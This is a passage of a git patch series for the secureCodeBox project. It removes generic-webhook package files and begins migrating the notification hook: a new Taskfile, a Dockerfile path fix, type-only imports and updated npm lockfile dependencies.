}, - "string-length": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/string-length/-/string-length-4.0.2.tgz", - "integrity": "sha512-+l6rNN5fYHNhZZy41RXsYptCjA2Igmq4EG7kZAYFQI1E1VTXarr6ZPXBg6eq7Y6eK4FEhY6AJlyuFIb/v/S0VQ==", - "dev": true, - "requires": { - "char-regex": "^1.0.2", - "strip-ansi": "^6.0.0" - } - }, - "string-width": { - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "dev": true, - "requires": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - } - }, - "strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "dev": true, - "requires": { - "ansi-regex": "^5.0.1" - } - }, - "strip-bom": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/strip-bom/-/strip-bom-4.0.0.tgz", - "integrity": "sha512-3xurFv5tEgii33Zi8Jtp55wEIILR9eh34FAW00PZf+JnSsTmV/ioewSgQl97JHvgjoRGwPShsWm+IdrxB35d0w==", - "dev": true - }, - "strip-final-newline": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/strip-final-newline/-/strip-final-newline-2.0.0.tgz", - "integrity": "sha512-BrpvfNAE3dcvq7ll3xVumzjKjZQ5tI1sEUIKr3Uoks0XUl45St3FlatVqef9prk4jRDzhW6WZg+3bk93y6pLjA==", - "dev": true - }, - "strip-json-comments": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-3.1.1.tgz", - "integrity": "sha512-6fPc+R4ihwqP6N/aIv2f1gMH8lOVtWQHoqC4yK6oSDVVocumAsfCqjkXnqiYMhmMwS/mEHLp7Vehlt3ql6lEig==", - "dev": true - }, - "supports-color": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", - "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", - "dev": true, - "requires": { - "has-flag": "^4.0.0" - } - }, - "supports-preserve-symlinks-flag": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", - "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", - "dev": true - }, - "test-exclude": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/test-exclude/-/test-exclude-6.0.0.tgz", - "integrity": "sha512-cAGWPIyOHU6zlmg88jwm7VRyXnMN7iV68OGAbYDk/Mh/xC/pzVPlQtY6ngoIH/5/tciuhGfvESU8GrHrcxD56w==", - "dev": true, - "requires": { - "@istanbuljs/schema": "^0.1.2", - "glob": "^7.1.4", - "minimatch": "^3.0.4" - } - }, - "tmpl": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/tmpl/-/tmpl-1.0.5.tgz", - "integrity": "sha512-3f0uOEAQwIqGuWW2MVzYg8fV/QNnc/IpuJNG837rLuczAaLVHslWHZQj4IGiEl5Hs3kkbhwL9Ab7Hrsmuj+Smw==", - "dev": true - }, - "to-fast-properties": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/to-fast-properties/-/to-fast-properties-2.0.0.tgz", - "integrity": "sha512-/OaKK0xYrs3DmxRYqL/yDc+FxFUVYhDlXMhRmv3z915w2HF1tnN1omB354j8VUGO/hbRzyD6Y3sA7v7GS/ceog==", - "dev": true - }, - "to-regex-range": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", - "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==", - "dev": true, - "requires": { - "is-number": "^7.0.0" - } - }, - "type-detect": { - "version": "4.0.8", - "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-4.0.8.tgz", - "integrity": "sha512-0fr/mIH1dlO+x7TlcMy+bIDqKPsw/70tVyeHW787goQjhmqaZe10uwLujubK9q9Lg6Fiho1KUKDYz0Z7k7g5/g==", - "dev": true - }, - "type-fest": { - "version": "0.21.3", - "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.21.3.tgz", - "integrity": "sha512-t0rzBq87m3fVcduHDUFhKmyyX+9eo6WQjZvf51Ea/M0Q7+T374Jp1aUiyUl0GKxp8M/OETVHSDvmkyPgvX+X2w==", - "dev": true - }, - "update-browserslist-db": { - "version": "1.0.11", - "resolved": "https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.0.11.tgz", - "integrity": "sha512-dCwEFf0/oT85M1fHBg4F0jtLwJrutGoHSQXCh7u4o2t1drG+c0a9Flnqww6XUKSfQMPpJBRjU8d4RXB09qtvaA==", - "dev": true, - "requires": { - "escalade": "^3.1.1", - "picocolors": "^1.0.0" - } - }, - "v8-to-istanbul": { - "version": "9.1.0", - "resolved": "https://registry.npmjs.org/v8-to-istanbul/-/v8-to-istanbul-9.1.0.tgz", - "integrity": "sha512-6z3GW9x8G1gd+JIIgQQQxXuiJtCXeAjp6RaPEPLv62mH3iPHPxV6W3robxtCzNErRo6ZwTmzWhsbNvjyEBKzKA==", - "dev": true, - "requires": { - "@jridgewell/trace-mapping": "^0.3.12", - "@types/istanbul-lib-coverage": "^2.0.1", - "convert-source-map": "^1.6.0" - }, - "dependencies": { - "convert-source-map": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true - } - } - }, - "walker": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/walker/-/walker-1.0.8.tgz", - "integrity": "sha512-ts/8E8l5b7kY0vlWLewOkDXMmPdLcVV4GmOQLyxuSswIJsweeFZtAsMF7k1Nszz+TYBQrlYRmzOnr398y1JemQ==", - "dev": true, - "requires": { - "makeerror": "1.0.12" - } - }, - "which": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", - "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", - "dev": true, - "requires": { - "isexe": "^2.0.0" - } - }, - "wrap-ansi": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "dev": true, - "requires": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - } - }, - "wrappy": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==", - "dev": true - }, - "write-file-atomic": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-4.0.2.tgz", - "integrity": "sha512-7KxauUdBmSdWnmpaGFg+ppNjKF8uNLry8LyzjauQDOVONfFLNKrKvQOxZ/VuTIcS/gge/YNahf5RIIQWTSarlg==", - "dev": true, - "requires": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - } - }, - "y18n": { - "version": "5.0.8", - "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz", - "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==", - "dev": true - }, - "yallist": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", - "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==", - "dev": true - }, - "yargs": { - "version": "17.7.2", - "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.7.2.tgz", - "integrity": "sha512-7dSzzRQ++CKnNI/krKnYRV7JKKPUXMEh61soaHKg9mrWEhzFWhFnxPxGl+69cD1Ou63C13NUPCnmIcrvqCuM6w==", - "dev": true, - "requires": { - "cliui": "^8.0.1", - "escalade": "^3.1.1", - "get-caller-file": "^2.0.5", - "require-directory": "^2.1.1", - "string-width": "^4.2.3", - "y18n": "^5.0.5", - "yargs-parser": "^21.1.1" - } - }, - "yargs-parser": { - "version": "21.1.1", - "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", - "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", - "dev": true - }, - "yocto-queue": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz", - "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==", - "dev": true - } - } -} diff --git a/hooks/generic-webhook/hook/package-lock.json.license b/hooks/generic-webhook/hook/package-lock.json.license deleted file mode 100644 index c95bc37185..0000000000 --- a/hooks/generic-webhook/hook/package-lock.json.license +++ /dev/null @@ -1,3 +0,0 @@ -SPDX-FileCopyrightText: the secureCodeBox authors - -SPDX-License-Identifier: Apache-2.0 diff --git a/hooks/generic-webhook/hook/package.json b/hooks/generic-webhook/hook/package.json deleted file mode 100644 index 70916740ff..0000000000 --- a/hooks/generic-webhook/hook/package.json +++ /dev/null @@ -1,45 +0,0 @@ -{ - "name": "@securecodebox/hook-generic-webhook", - "version": "1.0.0", - "description": "secureCodeBox Generic WebHook.", - "homepage": "https://www.secureCodeBox.io", - "repository": { - "type": "git", - "url": "git+https://github.com/secureCodeBox/secureCodeBox.git" - }, - "main": "hook.js", - "scripts": { - "test": "jest --verbose --ci --colors --coverage --passWithNoTests" - }, - "keywords": [ - "secureCodeBox", - "security", - "hook" - ], - "author": { - "name": "iteratec GmbH", - "email": "securecodebox@iteratec.com", - "url": "https://www.iteratec.com" - }, - "contributors": [ - { - "name": "Jannik Hollenbach", - "url": "https://github.com/J12934" - }, - { - "name": "Robert Seedorff", - "url": "https://github.com/rseedorff" - } - ], - "bugs": { - "url": "https://github.com/secureCodeBox/secureCodeBox/issues" - }, - "license": "Apache-2.0", - "dependencies": { - "axios": "^1.6.0" - }, - "devDependencies": { - "@types/jest": "^29.4.0", - "jest": "^29.3.1" - } -} diff --git a/hooks/generic-webhook/hook/package.json.license b/hooks/generic-webhook/hook/package.json.license deleted file mode 100644 index c95bc37185..0000000000 --- a/hooks/generic-webhook/hook/package.json.license +++ /dev/null @@ -1,3 +0,0 @@ -SPDX-FileCopyrightText: the secureCodeBox authors - -SPDX-License-Identifier: Apache-2.0 From 8326436c9ead95cda44f92fe79b346a0afe9f149 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Thu, 10 Jul 2025 14:12:23 +0200 Subject: [PATCH 108/137] Start migrating the notification hook --- hooks/notification/Taskfile.yaml | 17 + hooks/notification/hook/Dockerfile | 2 +- hooks/notification/hook/model/Scan.ts | 6 +- hooks/notification/hook/package-lock.json | 10121 +++------------- hooks/notification/hook/package.json | 18 +- .../notification-hook-helm-values.yaml | 14 + tests/integration/helpers.ts | 2 +- 7 files changed, 1812 insertions(+), 8368 deletions(-) create mode 100644 hooks/notification/Taskfile.yaml create mode 100644 hooks/notification/integration-tests/notification-hook-helm-values.yaml diff --git a/hooks/notification/Taskfile.yaml b/hooks/notification/Taskfile.yaml new file mode 100644 index 0000000000..3d3d7c5408 --- /dev/null +++ b/hooks/notification/Taskfile.yaml @@ -0,0 +1,17 @@ +version: "3" + +includes: + scanner: + taskfile: ../Taskfile.yaml + flatten: true + excludes: + - predeploy + vars: + hookName: notification + additionalHelmInstallArgsForHook: | + --values=./integrations-tests/notification-hook-helm-values.yaml \ + +tasks: + predeploy: + deps: + - demo-targets:deploy:http-webhook diff --git a/hooks/notification/hook/Dockerfile b/hooks/notification/hook/Dockerfile index eb7961a9ea..0bbcc3f322 100644 --- a/hooks/notification/hook/Dockerfile +++ b/hooks/notification/hook/Dockerfile @@ -21,4 +21,4 @@ RUN npm run build && rm -rf node_modules FROM ${namespace:-securecodebox}/hook-sdk-nodejs:${baseImageTag:-latest} WORKDIR /home/app/hook-wrapper/hook/ COPY --from=install --chown=root:root --chmod=755 /home/app/node_modules/ ./node_modules/ -COPY --from=build --chown=root:root --chmod=755 /home/app/ ./ +COPY --from=build --chown=root:root --chmod=755 /home/app/build/ ./ diff --git a/hooks/notification/hook/model/Scan.ts b/hooks/notification/hook/model/Scan.ts index a5845b439e..5bcd6daf4c 100644 --- a/hooks/notification/hook/model/Scan.ts +++ b/hooks/notification/hook/model/Scan.ts @@ -2,10 +2,10 @@ // // SPDX-License-Identifier: Apache-2.0 -import * as k8s from "@kubernetes/client-node"; +import type { V1EnvVar, V1ObjectMeta } from "@kubernetes/client-node"; export interface Scan { - metadata: k8s.V1ObjectMeta; + metadata: V1ObjectMeta; spec: ScanSpec; status: Status; } @@ -13,7 +13,7 @@ export interface Scan { export interface ScanSpec { scanType: string; parameters: Array; - env?: Array; + env?: Array; } export interface Status { diff --git a/hooks/notification/hook/package-lock.json b/hooks/notification/hook/package-lock.json index dbfea4cc72..fa743d1175 100644 --- a/hooks/notification/hook/package-lock.json +++ b/hooks/notification/hook/package-lock.json @@ -9,8247 +9,2288 @@ "version": "1.0.0", "license": "Apache-2.0", "dependencies": { - "@kubernetes/client-node": "^0.18.1", "@types/js-yaml": "^4.0.2", "axios": "^1.6.0", "js-yaml": "^4.1.0", "lodash": "^4.17.21", - "nodemailer": "^6.9.9", + "nodemailer": "^6.10.1", "nunjucks": "^3.2.4" }, "devDependencies": { - "@types/jest": "^29.4.0", + "@kubernetes/client-node": "^1.3.0", + "@types/jest": "^30.0.0", "@types/lodash": "^4.14.171", "@types/mustache": "^4.1.2", - "@types/node": "^16.0.0", + "@types/node": "^22.16.2", "@types/nodemailer": "^6.4.4", "@types/nunjucks": "^3.1.5", - "jest": "^29.3.1", - "ts-jest": "^29.0.5", - "typescript": "^4.3.5" + "typescript": "^5.8.3" } }, "node_modules/@babel/code-frame": { - "version": "7.22.13", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.22.13.tgz", - "integrity": "sha512-XktuhWlJ5g+3TJXc5upd9Ks1HutSArik6jf2eAjYFyIOf4ej3RN+184cZbzDvbPnuTJIUhPKKJE3cIsYTiAT3w==", + "version": "7.27.1", + "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.27.1.tgz", + "integrity": "sha512-cjQ7ZlQ0Mv3b47hABuTevyTuYN4i+loJKGeV9flcCgIK37cCXRh+L1bd3iBHlynerhQ7BhCkn2BPbQUL+rGqFg==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/highlight": "^7.22.13", - "chalk": "^2.4.2" + "@babel/helper-validator-identifier": "^7.27.1", + "js-tokens": "^4.0.0", + "picocolors": "^1.1.1" }, "engines": { "node": ">=6.9.0" } }, - "node_modules/@babel/code-frame/node_modules/ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", - "dev": true, - "dependencies": { - "color-convert": "^1.9.0" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/code-frame/node_modules/chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", + "node_modules/@babel/helper-validator-identifier": { + "version": "7.27.1", + "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.27.1.tgz", + "integrity": "sha512-D2hP9eA+Sqx1kBZgzxZh0y1trbuU+JoDkiEwqhQ36nodYqJwyEIhPSdMNd7lOm/4io72luTPWH20Yda0xOuUow==", "dev": true, - "dependencies": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" - }, + "license": "MIT", "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/code-frame/node_modules/color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", - "dev": true, - "dependencies": { - "color-name": "1.1.3" + "node": ">=6.9.0" } }, - "node_modules/@babel/code-frame/node_modules/color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", - "dev": true - }, - "node_modules/@babel/code-frame/node_modules/escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", + "node_modules/@jest/diff-sequences": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/diff-sequences/-/diff-sequences-30.0.1.tgz", + "integrity": "sha512-n5H8QLDJ47QqbCNn5SuFjCRDrOLEZ0h8vAHCK5RL9Ls7Xa8AQLa/YxAc9UjFqoEDM48muwtBGjtMY5cr0PLDCw==", "dev": true, + "license": "MIT", "engines": { - "node": ">=0.8.0" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/code-frame/node_modules/has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", + "node_modules/@jest/get-type": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/get-type/-/get-type-30.0.1.tgz", + "integrity": "sha512-AyYdemXCptSRFirI5EPazNxyPwAL0jXt3zceFjaj8NFiKP9pOi0bfXonf6qkf82z2t3QWPeLCWWw4stPBzctLw==", "dev": true, + "license": "MIT", "engines": { - "node": ">=4" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/code-frame/node_modules/supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", + "node_modules/@jest/pattern": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/pattern/-/pattern-30.0.1.tgz", + "integrity": "sha512-gWp7NfQW27LaBQz3TITS8L7ZCQ0TLvtmI//4OwlQRx4rnWxcPNIYjxZpDcN4+UlGxgm3jS5QPz8IPTCkb59wZA==", "dev": true, + "license": "MIT", "dependencies": { - "has-flag": "^3.0.0" + "@types/node": "*", + "jest-regex-util": "30.0.1" }, "engines": { - "node": ">=4" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/compat-data": { - "version": "7.15.0", - "resolved": "https://registry.npmjs.org/@babel/compat-data/-/compat-data-7.15.0.tgz", - "integrity": "sha512-0NqAC1IJE0S0+lL1SWFMxMkz1pKCNCjI4tr2Zx4LJSXxCLAdr6KyArnY+sno5m3yH9g737ygOyPABDsnXkpxiA==", + "node_modules/@jsep-plugin/assignment": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/@jsep-plugin/assignment/-/assignment-1.3.0.tgz", + "integrity": "sha512-VVgV+CXrhbMI3aSusQyclHkenWSAm95WaiKrMxRFam3JSUiIaQjoMIw2sEs/OX4XifnqeQUN4DYbJjlA8EfktQ==", "dev": true, + "license": "MIT", "engines": { - "node": ">=6.9.0" + "node": ">= 10.16.0" + }, + "peerDependencies": { + "jsep": "^0.4.0||^1.0.0" } }, - "node_modules/@babel/core": { - "version": "7.15.0", - "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.15.0.tgz", - "integrity": "sha512-tXtmTminrze5HEUPn/a0JtOzzfp0nk+UEXQ/tqIJo3WDGypl/2OFQEMll/zSFU8f/lfmfLXvTaORHF3cfXIQMw==", + "node_modules/@jsep-plugin/regex": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/@jsep-plugin/regex/-/regex-1.0.4.tgz", + "integrity": "sha512-q7qL4Mgjs1vByCaTnDFcBnV9HS7GVPJX5vyVoCgZHNSC9rjwIlmbXG5sUuorR5ndfHAIlJ8pVStxvjXHbNvtUg==", "dev": true, - "dependencies": { - "@babel/code-frame": "^7.14.5", - "@babel/generator": "^7.15.0", - "@babel/helper-compilation-targets": "^7.15.0", - "@babel/helper-module-transforms": "^7.15.0", - "@babel/helpers": "^7.14.8", - "@babel/parser": "^7.15.0", - "@babel/template": "^7.14.5", - "@babel/traverse": "^7.15.0", - "@babel/types": "^7.15.0", - "convert-source-map": "^1.7.0", - "debug": "^4.1.0", - "gensync": "^1.0.0-beta.2", - "json5": "^2.1.2", - "semver": "^6.3.0", - "source-map": "^0.5.0" - }, + "license": "MIT", "engines": { - "node": ">=6.9.0" + "node": ">= 10.16.0" }, - "funding": { - "type": "opencollective", - "url": "https://opencollective.com/babel" + "peerDependencies": { + "jsep": "^0.4.0||^1.0.0" } }, - "node_modules/@babel/core/node_modules/source-map": { - "version": "0.5.7", - "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.5.7.tgz", - "integrity": "sha1-igOdLRAh0i0eoUyA2OpGi6LvP8w=", + "node_modules/@kubernetes/client-node": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-1.3.0.tgz", + "integrity": "sha512-IE0yrIpOT97YS5fg2QpzmPzm8Wmcdf4ueWMn+FiJSI3jgTTQT1u+LUhoYpdfhdHAVxdrNsaBg2C0UXSnOgMoCQ==", "dev": true, - "engines": { - "node": ">=0.10.0" + "license": "Apache-2.0", + "dependencies": { + "@types/js-yaml": "^4.0.1", + "@types/node": "^22.0.0", + "@types/node-fetch": "^2.6.9", + "@types/stream-buffers": "^3.0.3", + "form-data": "^4.0.0", + "hpagent": "^1.2.0", + "isomorphic-ws": "^5.0.0", + "js-yaml": "^4.1.0", + "jsonpath-plus": "^10.3.0", + "node-fetch": "^2.6.9", + "openid-client": "^6.1.3", + "rfc4648": "^1.3.0", + "socks-proxy-agent": "^8.0.4", + "stream-buffers": "^3.0.2", + "tar-fs": "^3.0.8", + "ws": "^8.18.2" } }, - "node_modules/@babel/generator": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.23.0.tgz", - "integrity": "sha512-lN85QRR+5IbYrMWM6Y4pE/noaQtg4pNiqeNGX60eqOfo6gtEj6uw/JagelB8vVztSd7R6M5n1+PQkDbHbBRU4g==", + "node_modules/@types/istanbul-lib-coverage": { + "version": "2.0.6", + "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.6.tgz", + "integrity": "sha512-2QF/t/auWm0lsy8XtKVPG19v3sSOQlJe/YHZgfjb/KBBHOGSV+J2q/S671rcq9uTBrLAXmZpqJiaQbMT+zNU1w==", "dev": true, - "dependencies": { - "@babel/types": "^7.23.0", - "@jridgewell/gen-mapping": "^0.3.2", - "@jridgewell/trace-mapping": "^0.3.17", - "jsesc": "^2.5.1" - }, - "engines": { - "node": ">=6.9.0" - } + "license": "MIT" }, - "node_modules/@babel/helper-compilation-targets": { - "version": "7.15.0", - "resolved": "https://registry.npmjs.org/@babel/helper-compilation-targets/-/helper-compilation-targets-7.15.0.tgz", - "integrity": "sha512-h+/9t0ncd4jfZ8wsdAsoIxSa61qhBYlycXiHWqJaQBCXAhDCMbPRSMTGnZIkkmt1u4ag+UQmuqcILwqKzZ4N2A==", + "node_modules/@types/istanbul-lib-report": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", + "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", "dev": true, "dependencies": { - "@babel/compat-data": "^7.15.0", - "@babel/helper-validator-option": "^7.14.5", - "browserslist": "^4.16.6", - "semver": "^6.3.0" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" + "@types/istanbul-lib-coverage": "*" } }, - "node_modules/@babel/helper-environment-visitor": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-environment-visitor/-/helper-environment-visitor-7.22.20.tgz", - "integrity": "sha512-zfedSIzFhat/gFhWfHtgWvlec0nqB9YEIVrpuwjruLlXfUSnA8cJB0miHKwqDnQ7d32aKo2xt88/xZptwxbfhA==", + "node_modules/@types/istanbul-reports": { + "version": "3.0.4", + "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.4.tgz", + "integrity": "sha512-pk2B1NWalF9toCRu6gjBzR69syFjP4Od8WRAX+0mmf9lAjCRicLOWc+ZrxZHx/0XRjotgkF9t6iaMJ+aXcOdZQ==", "dev": true, - "engines": { - "node": ">=6.9.0" + "license": "MIT", + "dependencies": { + "@types/istanbul-lib-report": "*" } }, - "node_modules/@babel/helper-function-name": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/helper-function-name/-/helper-function-name-7.23.0.tgz", - "integrity": "sha512-OErEqsrxjZTJciZ4Oo+eoZqeW9UIiOcuYKRJA4ZAgV9myA+pOXhhmpfNCKjEH/auVfEYVFJ6y1Tc4r0eIApqiw==", + "node_modules/@types/jest": { + "version": "30.0.0", + "resolved": "https://registry.npmjs.org/@types/jest/-/jest-30.0.0.tgz", + "integrity": "sha512-XTYugzhuwqWjws0CVz8QpM36+T+Dz5mTEBKhNs/esGLnCIlGdRy+Dq78NRjd7ls7r8BC8ZRMOrKlkO1hU0JOwA==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/template": "^7.22.15", - "@babel/types": "^7.23.0" - }, - "engines": { - "node": ">=6.9.0" + "expect": "^30.0.0", + "pretty-format": "^30.0.0" } }, - "node_modules/@babel/helper-hoist-variables": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-hoist-variables/-/helper-hoist-variables-7.22.5.tgz", - "integrity": "sha512-wGjk9QZVzvknA6yKIUURb8zY3grXCcOZt+/7Wcy8O2uctxhplmUPkOdlgoNhmdVee2c92JXbf1xpMtVNbfoxRw==", + "node_modules/@types/jest/node_modules/@jest/expect-utils": { + "version": "30.0.4", + "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-30.0.4.tgz", + "integrity": "sha512-EgXecHDNfANeqOkcak0DxsoVI4qkDUsR7n/Lr2vtmTBjwLPBnnPOF71S11Q8IObWzxm2QgQoY6f9hzrRD3gHRA==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/types": "^7.22.5" + "@jest/get-type": "30.0.1" }, "engines": { - "node": ">=6.9.0" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/helper-member-expression-to-functions": { - "version": "7.15.0", - "resolved": "https://registry.npmjs.org/@babel/helper-member-expression-to-functions/-/helper-member-expression-to-functions-7.15.0.tgz", - "integrity": "sha512-Jq8H8U2kYiafuj2xMTPQwkTBnEEdGKpT35lJEQsRRjnG0LW3neucsaMWLgKcwu3OHKNeYugfw+Z20BXBSEs2Lg==", + "node_modules/@types/jest/node_modules/@jest/schemas": { + "version": "30.0.1", + "resolved": 